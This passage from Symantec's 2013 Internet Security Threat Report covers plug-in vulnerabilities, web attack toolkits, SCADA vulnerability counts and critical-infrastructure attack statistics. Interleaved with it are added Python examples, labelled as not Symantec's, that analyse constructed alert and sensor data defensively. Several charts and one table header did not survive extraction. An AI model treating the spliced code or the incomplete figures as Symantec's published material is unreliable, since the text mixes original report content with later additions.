Background
This metric examines the number of vulnerabilities affecting plug-ins for Web browsers. Browser plug-ins are technologies that run inside the Web browser and extend its features, for example by allowing additional multimedia content from Web pages to be rendered. Although plug-ins usually run inside the browser process, some vendors have started to execute them in sandbox containers in order to limit the potential harm of vulnerabilities. Unfortunately, Web browser plug-ins continue to be one of the most exploited vectors for Web-based attacks and for drive-by downloads that silently infect consumer and enterprise users.
Many browsers now include various plug-ins in their default installation and provide a framework to ease the installation of additional plug-ins. Plug-ins now provide much of the expected or desired functionality of Web browsers and are often required in order to use many commercial sites. Vulnerabilities affecting these plug-ins are an increasingly favored vector for a range of client-side attacks, and the exploits targeting these vulnerabilities are commonly included in attack kits. Web attack kits can exploit up to 25 different browser and browser plug-in vulnerabilities at one time and then have full access to download any malware to the endpoint system.
Some plug-in technologies include automatic update mechanisms that aid in keeping software up to date, which may help limit exposure to certain vulnerabilities. Enterprises that choose to disable these updating mechanisms, or continue to use vulnerable versions, put themselves at considerable risk of silent infection and exploitation. With the hundreds of millions of drive-by download attacks that Symantec identified in 2011, Web attacks continue to be a favorite infection vector for hackers and malware authors to breach enterprise and consumer systems. To help mitigate the risk, some browsers have started to check the version of installed third-party plug-ins and inform the user if any updates are available. Enterprises should also check whether every browser plug-in is needed and consider removing or disabling potentially vulnerable software.
Methodology
Web browser plug-in vulnerabilities comprise a sub-set of the total number of vulnerabilities cataloged by Symantec over the reporting period. The vulnerabilities in this section cover the entire range of possible severity ratings and include vulnerabilities that are both unconfirmed and confirmed by the vendor of the affected product. Confirmed vulnerabilities consist of security issues that the vendor has publicly acknowledged, by either releasing an advisory or otherwise making a public statement to concur that the vulnerability exists. Unconfirmed vulnerabilities are vulnerabilities that are reported by third parties, usually security researchers, which have not been publicly confirmed by the vendor. That a vulnerability is unconfirmed does not mean that the vulnerability report is not legitimate, only that the vendor has not released a public statement to confirm the existence of the vulnerability.
Data
Figure D.7. Browser Plug-in Vulnerabilities in 2011 and 2012 (Source: Symantec). [Bar chart: number of vulnerabilities per plug-in technology, 2011 vs. 2012, for Adobe Acrobat Reader, Adobe Flash, ActiveX, Apple QuickTime, Firefox extensions and Oracle Sun Java; vertical axis marked 20 to 120. Bar values are not recoverable from the extracted text.]
Commentary
• In 2012, 312 vulnerabilities affecting browser plug-ins were documented by Symantec, a very slight increase compared to the 308 vulnerabilities affecting browser plug-ins in 2011.
• ActiveX vulnerabilities increased in 2012, which may be due to the increase in Internet Explorer vulnerabilities.
• Adobe Flash Player and Java vulnerabilities increased in 2012. This trend was already visible in 2011 and grew again. It is also reflected in the vulnerability usage of attack toolkits, which focused on Adobe Flash Player, Adobe PDF Reader, and Java in 2012.
Symantec identified the following plug-in technologies as having the most reported vulnerabilities in 2012:
• Adobe Reader
• Adobe Flash Player
• Apple QuickTime
• Microsoft ActiveX
• Mozilla Firefox extensions
• Oracle Sun Java Platform Standard Edition (Java SE)
Web Attack Toolkits
Background
Web attack toolkits are collections of scripts, often PHP files, which are used to create malicious websites that use Web exploits to infect visitors. There are a few dozen known families used in the wild. Many toolkits are traded or sold on underground forums for US$100-1,000. Some are actively developed and new vulnerabilities are added over time, such as the Blackhole and Eleonore toolkits, which both added exploits for a variety of vulnerabilities during 2012.
Each new toolkit version released during the year was accompanied by increased malicious Web attack activity. As a new version emerges that incorporates new exploit functionality, we see increased use of it in the wild, making as much use of the new exploits as possible until potential victims have patched their systems.
Since many toolkits often use the same exploits, it is often difficult to identify the specific attack toolkit behind each infection attempt. On average, an attack toolkit contains around 10 different exploits, mostly focusing on browser-independent plug-in vulnerabilities found in applications such as Adobe Flash Player, PDF viewers, and Java. In general, older exploits are not removed from the toolkits, since some systems may still be unpatched. This is perhaps why many of the toolkits still contain an exploit for the old Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (BID 17462) from 2006. The malicious script will test all possible exploits in sequence until one succeeds. This may magnify the attack numbers seen for older vulnerabilities, even if they were unsuccessful.
For more information on Web attack toolkits, please read Appendix A: Threat Activity Trends: Analysis of Malicious Web Activity by Attack Toolkits.
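The sequential probing just described inflates per-exploit alert counts. The following added example (not Symantec's code, and not a toolkit) shows the defender-side correction: a victim's burst of exploit alerts from one malicious site is collapsed into a single kit session, so each visit is counted once and the exploit that fired last, after which the kit stopped, can be told apart from older exploits that were merely tried. The alerts, the 30-second window and the exploit labels other than BID 17462 are constructed for the example.

```python
"""Collapse per-exploit IDS alerts into attack-kit sessions so that a kit
cycling through its exploits counts as one infection attempt.

Added illustration, not Symantec's code. All alerts are constructed; only
BID 17462 (the MDAC RDS.Dataspace exploit named in the text) is real, the
other exploit labels and the session window are assumptions.
"""
from collections import Counter, defaultdict

SESSION_WINDOW = 30.0   # seconds; assumed gap that separates two kit visits


def sessions(alerts):
    """Group (ts, victim_ip, site, exploit) alerts into kit sessions.

    A session is every alert for one victim from one malicious site where
    each alert arrives within SESSION_WINDOW of the previous one. Returns a
    list of sessions, each a time-ordered list of alerts.
    """
    by_pair = defaultdict(list)
    for alert in sorted(alerts):
        by_pair[(alert[1], alert[2])].append(alert)
    out = []
    for seq in by_pair.values():
        current = [seq[0]]
        for alert in seq[1:]:
            if alert[0] - current[-1][0] <= SESSION_WINDOW:
                current.append(alert)
            else:
                out.append(current)
                current = [alert]
        out.append(current)
    return out


def summarize(alerts):
    """Return (raw alert count per exploit, number of sessions,
    per-exploit count of sessions in which that exploit fired last).

    Because a kit stops at the first exploit that succeeds, the last exploit
    of a session is the best guess at the one that worked; everything fired
    before it was tried and failed, however often the old exploit shows up
    in the raw counts.
    """
    raw = Counter(alert[3] for alert in alerts)
    sess = sessions(alerts)
    last = Counter(s[-1][3] for s in sess)
    return raw, len(sess), last


# Constructed alerts: two victims, three kit visits. The kit always tries
# BID 17462 first and moves on, so it dominates the raw counts without
# ever being the exploit that ended a session.
SAMPLE_ALERTS = [
    (0.0, "10.0.0.5", "kit.example", "BID 17462"),
    (0.5, "10.0.0.5", "kit.example", "java-exploit"),
    (1.0, "10.0.0.5", "kit.example", "flash-exploit"),
    (3.0, "10.0.0.6", "kit.example", "BID 17462"),
    (3.5, "10.0.0.6", "kit.example", "java-exploit"),
    (4.1, "10.0.0.6", "kit.example", "flash-exploit"),
    (100.0, "10.0.0.5", "kit.example", "BID 17462"),
    (100.4, "10.0.0.5", "kit.example", "java-exploit"),
]

if __name__ == "__main__":
    raw, count, last = summarize(SAMPLE_ALERTS)
    print("raw alerts:", dict(raw))
    print("sessions:", count, "last exploit per session:", dict(last))
```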
SCADA Vulnerabilities
Background
This metric examines the SCADA (Supervisory Control and Data Acquisition) security threat landscape. SCADA represents a wide range of protocols and technologies for monitoring and managing equipment and machinery in various sectors of critical infrastructure and industry. This includes, but is not limited to, power generation, manufacturing, oil and gas, water treatment, and waste management. Therefore, the security of SCADA technologies and protocols is a concern related to national security, because the disruption of related services can result in the failure of infrastructure and potential loss of life, among other consequences.
Methodology
This discussion is based on data surrounding publicly known vulnerabilities affecting SCADA technologies. The purpose of the metric is to provide insight into the state of security research in relation to SCADA systems. To a lesser degree, this may provide insight into the overall state of SCADA security. Vulnerabilities affecting SCADA systems may present a threat to critical infrastructure that relies on these systems. Due to the potential for disruption of critical services, these vulnerabilities may be associated with politically motivated or state-sponsored attacks. This is a concern for governments and/or enterprises that are involved in the critical infrastructure sector. While this metric provides insight into public SCADA vulnerability disclosures, due to the sensitive nature of vulnerabilities affecting critical infrastructure there is likely private security research conducted by SCADA technology and security vendors. Symantec does not have insight into any private research because the results of such research are not publicly disclosed.
Data
The number of SCADA vulnerabilities decreased dramatically in 2012. In 2012, there were 85 public SCADA vulnerabilities, a massive decrease when compared to the 129 vulnerabilities in 2011.
Commentary
Since the emergence of Stuxnet in 2010, the security of SCADA systems has been an area of concern. SCADA systems are generally not designed to be connected to the public Internet, but as Stuxnet demonstrated, this is not always a guarantee of security, as locally connected networks may become compromised and USB devices may also be used as an infection vehicle. As new vulnerabilities are discovered, the importance of providing a fix quickly is even greater for SCADA systems, but they can sometimes remain unpatched for longer than traditional software vulnerabilities.
p. 151
Symantec Corporation
Internet Security Threat Report 2013 :: Volume 18
APPENDIX :: E
GOVERNMENT THREAT ACTIVITY TRENDS
Government Threat Activity Trends
Whether the purposes behind government-targeted attacks involve disagreements with policies or programs, or are motivated by espionage or attempts to steal classified information for profit or other reasons, such attacks can have serious ramifications on organizations and those they serve. The Symantec Global Internet Security Threat Report provides an analysis of threat activity trends relating to government and Critical Infrastructure Protection (CIP), including malicious activity that Symantec observed in 2012. Attacks are defined as any malicious activity carried out over a network that has been detected by an intrusion detection system (IDS) or firewall. Definitions for the other types of malicious activities can be found in their respective sections within this report.
This section covers the following metrics and provides analysis and discussion of the trends indicated by the data:
• Malicious Activity by Critical Infrastructure Sector
• Sources of Origin for Government-targeted Attacks
• Attacks by Type: Notable Critical Infrastructure Sectors
Malicious Activity by Critical Infrastructure Sector
Background
This metric indicates the level to which government and critical infrastructure organizations may have been compromised and are being used by attackers as launching pads for malicious activity. These attacks could potentially expose sensitive and confidential information, which could have serious ramifications for government and critical infrastructure organizations. Such information could be used for strategic purposes in the case of state- or group-sponsored attacks, especially since attackers who use compromised computers for malicious activity can mask their actual location.
Methodology
This metric evaluates the amount of malicious activity originating from computers and networks that are known to belong to government and critical infrastructure sectors. To measure this, Symantec cross-references the IP addresses of known malicious computers with standard industrial classification (SIC[1]) codes that are assigned to each industry and provided by a third-party service.[2] Symantec has compiled data on numerous malicious activities that were detected originating from the IP address space of these organizations. These activities include bot-infected computers, phishing hosts, spam zombies, and network attack origins.
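The cross-referencing step described above, as an added worked example (not Symantec's code): a constructed CIDR-to-sector table stands in for the third-party SIC feed, and the function reports both a sector's share of observed activity and its share of distinct source IP addresses, two views that can rank sectors quite differently when a few heavily abused hosts generate most of a sector's activity. It goes slightly beyond the text in that swapping the lookup table for one keyed by country gives the source-of-origin metric of Figure E.2 with no other change. SECTOR_BLOCKS, the activity type names and all records are assumptions.

```python
"""Attribute malicious-activity observations to critical-infrastructure
sectors by cross-referencing source IP addresses with a sector table.

Added example, not Symantec's code. SECTOR_BLOCKS is a constructed stand-in
for the third-party SIC lookup (documentation prefixes only); all records
are constructed. A country-keyed table gives the Figure E.2 metric.
"""
import ipaddress
from collections import Counter, defaultdict

# Activity categories named in the methodology.
ACTIVITY_TYPES = {"bot", "phishing_host", "spam_zombie", "attack_origin"}

# Constructed stand-in for the IP -> SIC classification feed.
SECTOR_BLOCKS = [
    (ipaddress.ip_network("198.51.100.0/24"), "Financial services"),
    (ipaddress.ip_network("203.0.113.0/25"), "Manufacturing"),
    (ipaddress.ip_network("203.0.113.128/25"), "Biotech / Pharmaceutical"),
    (ipaddress.ip_network("192.0.2.0/26"), "Government"),
    (ipaddress.ip_network("192.0.2.64/26"), "Utilities/Energy"),
]


def lookup(ip, blocks=SECTOR_BLOCKS):
    """Longest-prefix match of an address against the table; None if unmapped."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, label in blocks:
        if addr.version == net.version and addr in net:
            if best is None or net.prefixlen > best[0].prefixlen:
                best = (net, label)
    return best[1] if best else None


def attribute(records, blocks=SECTOR_BLOCKS):
    """Summarise (ip, activity_type) records per sector.

    Returns {sector: {"activity": pct of observations, "ips": pct of distinct
    source addresses}}. Addresses outside every block are not CIP networks
    and are left out of both denominators.
    """
    events = Counter()
    sources = defaultdict(set)
    for ip, kind in records:
        if kind not in ACTIVITY_TYPES:
            raise ValueError(f"unknown activity type {kind!r}")
        sector = lookup(ip, blocks)
        if sector is None:
            continue
        events[sector] += 1
        sources[sector].add(ip)
    total_events = sum(events.values())
    if not total_events:
        return {}
    total_ips = sum(len(s) for s in sources.values())
    return {
        sector: {
            "activity": round(100.0 * events[sector] / total_events, 1),
            "ips": round(100.0 * len(sources[sector]) / total_ips, 1),
        }
        for sector in events
    }


# Constructed observations: two financial hosts are abused repeatedly,
# five manufacturing hosts once each, one government host once, and one
# address (192.0.2.200) that no CIP block covers.
SAMPLE_RECORDS = [
    ("198.51.100.10", "bot"), ("198.51.100.10", "spam_zombie"),
    ("198.51.100.10", "bot"), ("198.51.100.11", "phishing_host"),
    ("203.0.113.5", "attack_origin"), ("203.0.113.6", "attack_origin"),
    ("203.0.113.7", "bot"), ("203.0.113.8", "bot"), ("203.0.113.9", "spam_zombie"),
    ("192.0.2.3", "bot"),
    ("192.0.2.200", "bot"),
]

if __name__ == "__main__":
    for sector, pct in sorted(attribute(SAMPLE_RECORDS).items()):
        print(f"{sector:26s} activity {pct['activity']:5.1f}%  "
              f"source IPs {pct['ips']:5.1f}%")
```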
Data
Figure E.1 Malicious Activity by Critical Infrastructure Sector
Source: Symantec
Industry Sector | % of CIP Source Activity | (second column; header not present in the extracted text)
Financial services | 72.2% | 9.6%
Manufacturing | 16.0% | 71.5%
Biotech / Pharmaceutical | 4.7% | 6.0%
Government | 2.2% | 1.7%
Aerospace | 1.9% | 7.3%
Government - national | 1.2% | 0.8%
Government - state | 0.9% | 0.8%
Utilities/Energy | 0.3% | 0.3%
Internet Service Provider | 0.3% | 1.7%
Telecommunications | 0.1% | 0.1%
Government - Local | |
Sources of Origin for Government-targeted Attacks
Background
Attacks targeting government organizations may serve as a means of expressing disagreement with policies and programs that the government has developed and implemented. Such attacks are likely to be carried out for a variety of reasons, including blocking access to government Internet-based resources, gaining access to potentially sensitive information, and discrediting the government itself. In addition, attacks may be motivated by espionage and attempts to steal government-classified information. These attacks may result in the disruption of critical services, as with DoS attacks, or the exposure of highly sensitive information. An attack that disrupts the availability of a high-profile government organization website will get much wider notice than one that takes a single user offline. In addition, malicious code attacks targeting governments can be motivated by profit, because governments store considerable amounts of personal identification data that could be used for fraudulent purposes, such as identity theft. Personal data can include names, addresses, government-issued identification numbers, and bank account credentials, all of which can be effectively exploited for fraud by attackers. Government databases also store information that could attract politically motivated attacks, including critical infrastructure information and other sensitive intelligence. In February, several attacks targeting a government organization consisted of spoofed emails sent to U.S. military officials with subjects like "U.S. Air Force Procurement Plan 2012" and "[UNCLASSIFIED] 2012 U.S. Army orders for weapons." These prompted recipients to click on a link, which would download malicious code in an attempt to steal confidential information.[3]
Methodology
This metric assesses the top sources of origin for government-targeted attacks by determining the location of the computers from which the attacks occurred. It should be noted that attackers often attempt to obscure their tracks by redirecting attacks through one or more servers that may be located anywhere in the world; thus, the attacker may be located somewhere other than where the attacks appear to originate.
Data
Figure E.2 Sources of Origin for Government-targeted Attacks
Source: Symantec
Country | % of Source Activity | % of Source IP Addresses
United States | 73.67% | 16.73%
China | 11.88% | 54.56%
United Kingdom | 2.23% | 1.98%
Netherlands | 2.17% | 3.28%
Russia | 2.10% | 7.22%
Taiwan | 1.92% | 4.92%
Brazil | 1.68% | 5.89%
Germany | 1.54% | 2.47%
Korea, South | 1.41% | 1.70%
France | 1.40% | 1.25%
Commentary
• The United States and China were the top two sources of origin for attacks that targeted the Government sector in 2012.
• This could be a consequence of the large numbers of insecure systems in the United States and China, which may be used for staging an attack.
Attacks by Type: Notable Critical Infrastructure Sectors
Background
This section of the Symantec Government Internet Security Threat Report focuses on the types of attacks detected by sensors deployed in notable critical infrastructure sectors. Government and critical infrastructure organizations are the target of a wide variety of attack types. The ability to identify attacks by type assists security administrators in evaluating which assets may be targeted and may assist them in securing those assets receiving a disproportionate number of attacks.
The following sectors will be discussed in detail:
• Government
• Biotech/Pharmaceutical
• Healthcare
• Financial Services
• Transportation
• Telecommunications
• Utilities
Methodology
The following types of attacks are considered for this metric:
Attacks on Web Servers: Web servers facilitate a variety of services for government and critical infrastructure sectors, such as hosting publicly available information, customer support portals, and online stores. Some Web servers also host remotely accessible interfaces that employees use to perform routine, job-related tasks from remote locations. Furthermore, a Web server may be a portal to an organization's internal network and database systems.
Attacks on Web Browsers: Web browsers are exposed to a greater amount of potentially untrusted or hostile content than most other applications. As the Internet has become commonplace in business and leisure activities, there is an increased reliance on browsers and their plug-ins. Attacks on Web browsers can originate from malicious websites as well as from legitimate websites that have been compromised to serve malicious content. Browsers can also facilitate client-side attacks because of their use of plug-ins and other applications in handling potentially malicious content served from the Web, such as compromised documents and media files.
Attacks on SMTP (Simple Mail Transfer Protocol): SMTP is designed to facilitate the delivery of email messages across the Internet. Email servers using SMTP as a service are likely targets for attackers because external access is required to deliver email. While most services can be blocked by a firewall to protect against external attacks and allow access only to trusted users and entities, for email to function effectively for organizations it has to be available both internally and externally to other email servers. The necessity of allowing both internal and external access increases the probability of a successful attack, and with it the attackers' chances of gaining access to the network.
Denial-of-Service (DoS) Attacks: DoS attacks are a threat to government and critical infrastructures because the purpose of such attacks is to disrupt the availability of high-profile websites or other network services and make them inaccessible to users and employees. A successful DoS attack could result in the disruption of internal and external communications, making it practically impossible for employees and users to access potentially critical information. Because these attacks often receive greater exposure than those that take a single user offline, especially for high-profile government websites, they could also result in damage to the organization's reputation. A successful DoS attack on a government network could also severely undermine confidence in government competence and impair the defense and protection of government networks.
Backscatter: Generally, backscatter is considered to be a type of Internet background noise, which is typically ignored. While not a direct attack, backscatter is evidence that a DoS attack against another server on the Internet is taking place and is making use of spoofed IP addresses. When one of these spoofed IP addresses matches the address of a Symantec sensor, any error messages that the attacked server sends to the spoofed address will be detected by the Symantec sensor as backscatter.
Shellcode/Exploit Attacks: Shellcode is a small piece of code used as the payload in the exploitation of a vulnerability. An attacker can exploit a vulnerability to gain access to a system, inject this code, and use a command shell to take control of the compromised machine. By remotely controlling a compromised system, an attacker can gain access to an organization's network and, from there, perpetrate additional attacks. Moreover, this type of attack can monopolize valuable resources that may be critical to government operations.
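The attack categories and the backscatter rule above, as an added worked example (not Symantec's code): a small classifier over constructed sensor events that treats a SYN-ACK, RST or ICMP error arriving for a connection the sensor never opened as backscatter, maps IDS signature hits onto the categories of Figure E.3, and counts a SYN flood once as a DoS rather than once per packet. SENSOR_IP, the signature class names, the 50-SYN threshold and all events are assumptions made for the example.

```python
"""Classify sensor-detected events into the attack types used in this metric
and separate backscatter from direct attacks.

Added illustration, not Symantec's code. The sensor address, signature
classes, the DoS threshold and every event below are constructed.
"""
from collections import Counter

SENSOR_IP = "192.0.2.10"        # constructed sensor address
DOS_SYN_THRESHOLD = 50          # assumed: this many bare SYNs from one source = flood
REPLY_FLAGS = ({"S", "A"}, {"R"}, {"R", "A"})   # TCP replies to a connection attempt
ICMP_ERRORS = {"unreachable", "time-exceeded"}
SIG_TO_TYPE = {                 # IDS signature class -> attack type of Figure E.3
    "web-server": "Web (server)",
    "web-browser": "Web (browser)",
    "shellcode": "Shellcode/Exploit",
    "p2p": "P2P",
    "smtp": "SMTP (email)",
}


def classify(events):
    """Return (Counter of direct attacks by type, list of backscatter events).

    Backscatter rule from the text: a reply (SYN-ACK, RST or ICMP error)
    arriving at the sensor for a connection the sensor never opened means
    someone spoofed the sensor's address in a DoS against that host.
    """
    counts = Counter()
    backscatter = []
    opened = set()          # (host, port) pairs the sensor itself sent a SYN to
    bare_syns = Counter()   # SYN-only packets per attacking source
    for ev in events:
        if ev["src"] == SENSOR_IP:
            if ev["proto"] == "tcp" and ev["flags"] == {"S"}:
                opened.add((ev["dst"], ev["dport"]))
            continue        # the sensor's own traffic is never an attack
        if ev["proto"] == "icmp" and ev.get("icmp_type") in ICMP_ERRORS:
            if not any(host == ev["src"] for host, _ in opened):
                backscatter.append(ev)
            continue
        if ev["proto"] == "tcp" and ev["flags"] in REPLY_FLAGS:
            if (ev["src"], ev["sport"]) not in opened:
                backscatter.append(ev)
            continue        # solicited reply: ordinary traffic
        if ev.get("sig") in SIG_TO_TYPE:
            counts[SIG_TO_TYPE[ev["sig"]]] += 1
        elif ev["proto"] == "tcp" and ev["flags"] == {"S"}:
            bare_syns[ev["src"]] += 1
    for n in bare_syns.values():
        if n >= DOS_SYN_THRESHOLD:
            counts["DoS"] += 1      # one flood counted once, not per packet
    return counts, backscatter


def share(counts):
    """Percent of direct attacks per type, the breakdown shown in Figure E.3."""
    total = sum(counts.values())
    return {t: round(100.0 * n / total, 1) for t, n in counts.items()}


def _ev(src, dst, proto, sport, dport, flags=(), sig=None, icmp_type=None):
    return {"src": src, "dst": dst, "proto": proto, "sport": sport,
            "dport": dport, "flags": set(flags), "sig": sig, "icmp_type": icmp_type}


# Constructed sample: one page fetch by the sensor with its legitimate reply,
# a booby-trapped response on that connection, two backscatter packets, a
# few signature hits and a SYN flood from a single source.
SAMPLE_EVENTS = (
    [_ev(SENSOR_IP, "203.0.113.7", "tcp", 40001, 80, "S"),
     _ev("203.0.113.7", SENSOR_IP, "tcp", 80, 40001, "SA"),
     _ev("203.0.113.7", SENSOR_IP, "tcp", 80, 40001, "A", sig="web-browser"),
     _ev("198.51.100.9", SENSOR_IP, "tcp", 80, 51515, "SA"),           # unsolicited
     _ev("198.51.100.9", SENSOR_IP, "icmp", None, None, icmp_type="unreachable"),
     _ev("198.51.100.20", SENSOR_IP, "tcp", 5555, 25, "A", sig="smtp"),
     _ev("198.51.100.21", SENSOR_IP, "tcp", 5556, 445, "A", sig="shellcode")]
    + [_ev("198.51.100.%d" % i, SENSOR_IP, "tcp", 6000 + i, 80, "A", sig="web-server")
       for i in (30, 31, 32)]
    + [_ev("198.51.100.77", SENSOR_IP, "tcp", 7000 + i, 80, "S") for i in range(60)]
)

if __name__ == "__main__":
    counts, bs = classify(SAMPLE_EVENTS)
    print("direct attacks:", dict(counts))
    print("shares:", share(counts))
    print("backscatter packets:", len(bs))
```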
Data and Commentary
Figure E.3 Attacks by Type – Overall Government and Critical Infrastructure Organizations
Source: Symantec
Attack type | Share of attacks
Web (server) | 79%
P2P | 7%
DoS | 6%
Shellcode/Exploit | 5%
Web (browser) | 2%
SMTP (email) | 1%
• Web server attacks were the most common type of attack for government and critical infrastructure: in 2012, the most common attack type seen by all sensors in the government and critical infrastructure sectors related to attacks on Web servers and accounted for 78.48 percent of all attacks.
• P2P attacks were the second-most common type of attack for government and critical infrastructure, accounting for 7.21 percent of attacks. P2P attacks comprise general ones, such as DoS, man-in-the-middle and worm propagation attacks, and specific ones, such as rational attacks, file poisoning, etc.
• DoS attacks are often associated with social and political protests, since they are intended to render a site inaccessible to legitimate users of those services. Man-in-the-middle attacks are those in which the attacker inserts himself undetected between two nodes. He can then choose to stay undetected and spy on the communication, or more actively manipulate the communication.
Figure E.4 Attacks by Type – Notable Critical Infrastructure Sectors (Source: Symantec). [Pie charts for the Government, Financial Services, Transportation and Utilities sectors, with slices labelled Web (server), DoS, SMTP (email), Shellcode/Exploit and P2P; the percentages cannot be matched to their sectors and slices in the extracted text.]
• The Financial Services and Transportation sectors were predominantly targeted by Web server attacks in 2012. These two sectors contribute the majority of Web server attacks seen in critical infrastructure sectors overall. This may indicate that attackers were specifically targeting these sectors and attempting to disrupt Web services, which are the backbone of these sectors.
• Shellcode/Exploit attacks have become the most common type for the Government and Healthcare sectors. Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode can be either local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).
• DoS attacks predominate in the Biotech, Telecommunications, and Utilities sectors, attempting to disrupt services and communications within them.
Government Threat Activity Endnotes
01 SIC codes are the standard industry codes that are used by the United States Securities and Exchange Commission to identify organizations belonging to each industry. For more information, please see http://www.sec.gov/.
02 See http://www.digitalenvoy.net/.
03 See http://www.huffingtonpost.com/2011/01/05/white-house-christmas-email_n_804547.html.
About Symantec
Symantec protects the world's information and is a global leader in security, backup, and availability solutions. Our innovative products and services protect people and information in any environment, from the smallest mobile device to the enterprise data center to cloud-based systems. Our world-renowned expertise in protecting data, identities, and interactions gives our customers confidence in a connected world. More information is available at www.symantec.com or by connecting with Symantec at go.symantec.com/socialmedia.
More Information
• Symantec.cloud Global Threats: http://www.symanteccloud.com/en/gb/globalthreats/.
• Symantec Security Response: http://www.symantec.com/security_response/.
• Internet Security Threat Report Resource Page: http://www.symantec.com/threatreport/.
• Norton Threat Explorer: http://us.norton.com/security_response/threatexplorer/.
• Norton Cybercrime Index: http://us.norton.com/cybercrimeindex/.
For specific country offices and contact numbers, please visit our website.
For product information in the U.S., call toll-free 1 (800) 745 6054.
Symantec Corporation World Headquarters
350 Ellis Street
Mountain View, CA 94043 USA
+1 (650) 527 8000
1 (800) 721 3934
www.symantec.com
Copyright © 2013 Symantec Corporation. All rights reserved. Symantec, the Symantec Logo, and the Checkmark Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
03/13 21284431
Confidence in a connected world.